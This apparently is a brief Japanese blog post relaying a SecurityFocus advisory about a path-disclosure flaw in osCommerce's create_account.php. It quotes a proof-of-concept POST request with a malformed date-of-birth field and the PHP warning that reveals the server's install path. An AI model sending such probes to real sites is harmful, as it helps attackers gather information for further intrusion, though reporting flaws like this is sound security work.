osCommerce 'create_account.php' Information Disclosure Vulnerability(情報元のブックマーク数)

IT セキュリティ

またもや、osCommerceに情報表示な脆弱性が存在とのこと。

osCommerce is prone to an information-disclosure vulnerability because it fails to sanitize user-supplied input.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

http://www.securityfocus.com/bid/31209/discuss

ディレクトリが見えるくらいかな・・・

POST /oscommerce/create_account.php

action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_a
ddre
ss=email (at) address (dot) com [email concealed]&company=foobar&street_address=foobar&suburb=foobar&
post
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=
1234
56789&newsletter=on&password=foobar&confirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80

http://www.securityfocus.com/archive/1/496417

screenshot